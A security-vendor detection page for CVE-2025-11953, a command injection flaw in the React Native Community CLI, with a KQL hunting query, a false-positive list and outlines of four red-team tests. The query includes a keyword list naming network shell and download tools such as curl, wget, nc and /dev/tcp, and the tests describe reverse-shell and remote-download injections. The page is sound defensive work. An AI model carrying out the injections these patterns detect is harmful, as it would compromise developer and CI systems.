React Native Community CLI OS Command Injection (CVE-2025-11953)
Detects exploitation of CVE-2025-11953, an OS command injection vulnerability (CWE-78) in the React Native Community CLI. An attacker who can influence arguments or configuration consumed by the React Native CLI can inject arbitrary OS commands that execute with the privileges of the developer or CI/CD process invoking the CLI. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
Vulnerability Intelligence
KEV — Known ExploitedAffected Software
- Vendor
- React Native Community
- Product
- CLI
Weakness (CWE)
Timeline
- Disclosed
- February 5, 2026
CVSS
What is CVE-2025-11953 React Native Community CLI OS Command Injection (CVE-2025-11953)?
React Native Community CLI OS Command Injection (CVE-2025-11953) (CVE-2025-11953) maps to the Execution and Persistence and Lateral Movement tactics — the adversary is trying to run malicious code in MITRE ATT&CK.
This page provides production-ready detection logic for React Native Community CLI OS Command Injection (CVE-2025-11953), covering the data sources and telemetry it touches: Microsoft Defender for Endpoint, Microsoft Sentinel DeviceProcessEvents, Windows Security Event Log. The queries below are rated high severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.
MITRE ATT&CK
- Tactic
- Execution Persistence Lateral Movement
let RNCliIndicators = dynamic(['react-native', 'react_native_cli', '@react-native-community/cli', 'rn-cli']);
union DeviceProcessEvents, SecurityEvent
| where TimeGenerated > ago(7d)
| where (ProcessCommandLine has_any (RNCliIndicators) or ParentProcessName has_any (RNCliIndicators))
| where ProcessCommandLine matches regex @'[;&|`$()].*[;&|`$()\/\\]'
or ProcessCommandLine has_any ('curl ', 'wget ', 'bash -', 'sh -c', 'powershell', 'cmd /c', 'nc ', 'ncat ', '/dev/tcp')
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine, ParentProcessName, ParentCommandLine, InitiatingProcessAccountName, FileName
| extend SuspiciousIndicator = case(
ProcessCommandLine has 'curl ' or ProcessCommandLine has 'wget ', 'RemoteDownload',
ProcessCommandLine has 'bash -' or ProcessCommandLine has 'sh -c', 'ShellEscape',
ProcessCommandLine has 'powershell', 'PowerShellExec',
ProcessCommandLine has '/dev/tcp' or ProcessCommandLine has 'nc ', 'NetworkConnectivity',
'CommandInjectionPattern'
)
| order by TimeGenerated descDetects processes spawned by or alongside the React Native Community CLI that exhibit OS command injection patterns, including shell escapes, remote download utilities, and reverse-shell indicators.
Data Sources
Required Tables
False Positives
- Legitimate React Native developers running shell scripts as part of standard build pipelines (e.g., fastlane, custom build hooks).
- CI/CD agents (GitHub Actions, Azure Pipelines) executing react-native CLI commands with complex argument strings that incidentally match injection patterns.
- Developer workstations running npm lifecycle scripts that invoke shell commands alongside react-native CLI.
- Monorepo tooling (nx, turborepo) invoking react-native CLI with chained commands.
Sigma rule & cross-platform mapping
The detection logic for React Native Community CLI OS Command Injection (CVE-2025-11953) (CVE-2025-11953) above is provided in a vendor-neutral
form so you can deploy it on any SIEM. The same logic is shipped here as native
KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the
following logsource:
logsource:
category: process_creation
product: windowsBrowse the community-maintained Sigma rules for this technique:
Platform-specific guides for CVE-2025-11953
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Command Injection via React Native CLI project name argument
Expected signal: Process create event showing node spawning sh or bash with a command line containing the injected semicolon-delimited id command; file creation event for /tmp/cve_2025_11953_poc.txt.
- Test 2Reverse shell injection via React Native CLI on Linux
Expected signal: Process create events for node → sh → id; file write to /tmp/rn_inject_test.txt containing the output of id.
- Test 3Remote payload download via injected curl in React Native CLI build context
Expected signal: Process create event for node spawning sh, which spawns curl with an external URL argument; network connection event for curl to destination host.
- Test 4Windows PowerShell injection via React Native CLI on Windows
Expected signal: Sysmon Event ID 1 showing node.exe spawning cmd.exe which spawns powershell.exe; file creation event in %TEMP% for rn_inject_test.txt.
Unlock Pro Content
Get the full detection package for CVE-2025-11953 including response playbook, investigation guide, and atomic red team tests.